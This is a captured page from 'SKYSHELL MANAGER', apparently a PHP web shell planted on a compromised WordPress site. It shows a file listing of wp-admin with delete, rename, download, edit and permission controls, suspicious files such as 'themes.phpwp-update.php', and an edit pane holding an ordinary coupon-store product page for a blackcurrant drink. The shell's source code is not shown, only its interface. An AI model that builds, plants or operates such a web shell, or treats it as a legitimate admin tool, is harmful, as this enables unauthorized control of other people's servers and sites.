📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: black.php
<!DOCTYPE html> <html> <head> <link rel="shortcut icon" href="images/fav.png" /> <title>Black Currant - Trends Coupon</title> <link href="css/bootstrap.css" rel="stylesheet" type="text/css" media="all" /> <!-- jQuery (necessary for Bootstrap's JavaScript plugins) --> <script src="js/jquery.min.js"></script> <!-- Custom Theme files --> <!--theme-style--> <link href="css/style.css" rel="stylesheet" type="text/css" media="all" /> <!--//theme-style--> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="keywords" content="Trends Coupon coupns, coupon deals,Retail things" /> <script type="application/x-javascript"> addEventListener("load", function() { setTimeout(hideURLbar, 0); }, false); function hideURLbar(){ window.scrollTo(0,1); } </script> <!--fonts--> <link href='http://fonts.googleapis.com/css?family=Lato:100,300,400,700,900' rel='stylesheet' type='text/css'> <link href='http://fonts.googleapis.com/css?family=Vollkorn:400,700' rel='stylesheet' type='text/css'> <!--//fonts--> <script type="text/javascript" src="js/move-top.js"></script> <script type="text/javascript" src="js/easing.js"></script> <script type="text/javascript"> jQuery(document).ready(function($) { $(".scroll").click(function(event){ event.preventDefault(); $('html,body').animate({scrollTop:$(this.hash).offset().top},1000); }); }); </script> </head> <body> <!--header--> <div class="header"> <div class="container"> <!----> <div class="logo"> <a href="index.php"><img src="images/logo3.png" alt="" style="width:75%;margin-top:-4%"></a> </div> <div class="header-right"> <div class="header-bottom"> <div class="top-nav"> <span class="menu"> </span> <ul> <li><a href="index.php">HOME</a> </li> <li><a href="about.php" > ABOUT US</a></li> <li class="active"><a href="product.php" > PRODUCTS</a></li> <li><a href="contact.php" > CONTACT US </a></li> <li><a href="subscribe.php">SUBSCRIBE </a></li> </ul> <!--script--> <script> $("span.menu").click(function(){ $(".top-nav ul").slideToggle(500, function(){ }); }); </script> </div> <a href="#" class="cart">+(501)503-5972</a> <div class="clearfix"> </div> </div> </div> <div class="clearfix"> </div> </div> </div> <!----> <!----> <div class="content"> <div class="container"> <!--- <div class="content-nestle" style="margin-top:3%;height:400px;"> <div> <h2 style="text-align:center;padding-top:15%;color:#FF1573;font-size:45px; text-shadow: 2px 2px yellow;">Products</h2> </div> <div class="clearfix"> </div> </div> <!----> <div class="content-bottom" style="margin-top:5%"> <nav class="breadcrumbs-container" aria-label="Breadcrumbs"> <a href="index.php"><b>Home</b></a> <span class="breadcrumbs-delimiter" aria-hidden="true"> <svg aria-hidden="true" focusable="false" role="presentation" xmlns="http://www.w3.org/2000/svg" width="8" height="5" viewBox="0 0 8 5"> <path fill="currentColor" fill-rule="evenodd" d="M1.002.27L.29.982l3.712 3.712L7.714.982 7.002.27l-3 3z"></path> </svg> </span> <a href="drink.php" title=""><b>Beverages & Drinks</b></a> <span class="breadcrumbs-delimiter" aria-hidden="true"> <svg aria-hidden="true" focusable="false" role="presentation" xmlns="http://www.w3.org/2000/svg" width="8" height="5" viewBox="0 0 8 5"> <path fill="currentColor" fill-rule="evenodd" d="M1.002.27L.29.982l3.712 3.712L7.714.982 7.002.27l-3 3z"></path> </svg> </span> <span>Robinsons Apple & Blackcurrant 900ml, No Added Sugar</span> </nav><br> <div class="prod-det"> <div class="prod-left"> <img src="images\beverages/blackcurrant.jpg" title="" alt="" style="width:100%"> </div> <div class="prod-right"> <h3>Robinsons Apple & Blackcurrant 900ml, No Added Sugar </h3><br> <h3>$3.1013 USD </h3> <div class="product-description rte" data-product-description=""> <p><strong>Buy Robinsons Apple & Blackcurrant 900ml, No Added Sugar Concentrated Low Calorie Apple and Blackcurrant Soft Drink with Sweeteners.,<br></strong></p> <div class="product-description rte" data-product-description=""> <p><strong>Get Next-day Delivery. </strong></p> <p><strong>Buy Robinsons Apple & Blackcurrant 900ml, No Added Sugar Concentrated Low Calorie Apple and Blackcurrant Soft Drink with Sweeteners.</strong></p> <ul> <li>No added sugar - contains naturally occurring sugars</li> </ul> <p><strong>Brand Marketing</strong> At Robinsons we work hard to choose the tastiest fruits, that are sun-ripened and harvest in season when they are fresh and juicy! This ensures we give you delicious real fruit in every drop.</p> <p><strong>Manufacturer Marketing</strong> By Appointment to HM The Queen Manufacturers of Fruit Juices and Soft Drinks, Britvic Soft Drinks Ltd, Hemel Hempstead</p> <p><strong>Ingredients</strong> Water, Fruit Juices from Concentrate (Apple 9%, Blackcurrant 1%), Acids (Citric Acid, Malic Acid), Natural Colour (Anthocyanins), Natural Flavouring, Acidity Regulator (Sodium Citrate), Sweeteners (Acesulfame K, Sucralose), Preservatives (Potassium Sorbate, Sodium Metabisulphite), Stabiliser (Cellulose Gum)</p> <p><strong>Additional Information</strong> Contains Sulphur Dioxide/Sulphites Widely Recycled Pack Type: Pack</p> <p><strong>Preparation and Usage</strong> Shake well. Bottle contains 18 servings</p> <p><strong>Manufacturer’s Address</strong> Britvic Soft Drinks Ltd., Hemel Hempstead, HP2 4TZ, UK.</p> <P><strong>Product Disclaimer</strong> <br>At <b>Trends Coupon.com</b>, we work to ensure that product information on our website is correct, manufacturers may alter their product information, packaging, ingredients, nutritional guides and allergy advice so you may occasionally see a change or difference in products. Please be aware that <b>Trends Coupon.com</b> are not the manufacturer of the products sold on our website. Actual product packaging and materials may contain more or other different information than shown on our website. If you have any specific product queries, please contact the manufacturer. We recommend that you always read the label carefully before using or consuming any products including medicinal products. Please do not solely rely on the information provided on our Trends Coupon.com website and therefore we are unable to accept liability for any inaccuracies or incorrect information contained or presented on our website.</P> </div> </div> </div> <div class="clearfix"> </div> </div> </div> <!----> <div class="grid-top-in"> <div class="grid-top"> <div class="col-md-4 top-grid "> <h5>ABOUT Trends Coupon.</h5> <p class="sed">"Trends Coupon"has become the leading online Retail store offering the widest variety of consumer products. Find everything from Retail, household cleaning products, health and beauty supplies, baby products, pet food and much more. Now the speed of online shopping, the convenience of fast delivery and the value of discount mercury can be yours from the comfort of your own home!.</p> </div> <div class="col-md-4 top-grid"> <h5>INFORMATION</h5> <ul class="social-in"> <li><a href="privacy.php">Privacy Policy</a></li> <li><a href="terms.php">Terms and Confditions</a></li> <li><a href="subscribe.php">Subscribe</a></li> <li><a href="unsubscribe.php">Unsubscribe</a></li> </ul> <div class="clearfix"> </div> </div> <div class="col-md-4 top-grid"> <h5>NEWSLETTER:</h5> <p class="nospace btmspace-15" style="margin-bottom:15px;">For weekly new updates </p> <form method="post" action="#"> <fieldset> <input class="btmspace-15" type="text" value="" placeholder="Name" style="margin-bottom:15px;width: 250px;"><br> <input class="btmspace-15" type="text" value="" placeholder="Email" style="margin-bottom:15px;width: 250px;"><br> <button type="submit" value="submit">Submit</button> </fieldset> </form> </div> <div class="clearfix"> </div> </div> </div> </div> </div> <!----> <div class="footer"> <div class="container"> <p class="footer-grid">Copyright © 2023. All Rights Reserved.</p> </div> <script type="text/javascript"> $(document).ready(function() { /* var defaults = { containerID: 'toTop', // fading element id containerHoverID: 'toTopHover', // fading element hover id scrollSpeed: 1200, easingType: 'linear' }; */ $().UItoTop({ easingType: 'easeOutQuart' }); }); </script> <a href="#" id="toTop" style="display: block;"> <span id="toTopHover" style="opacity: 1;"> </span></a> </div> </body> </html>
Save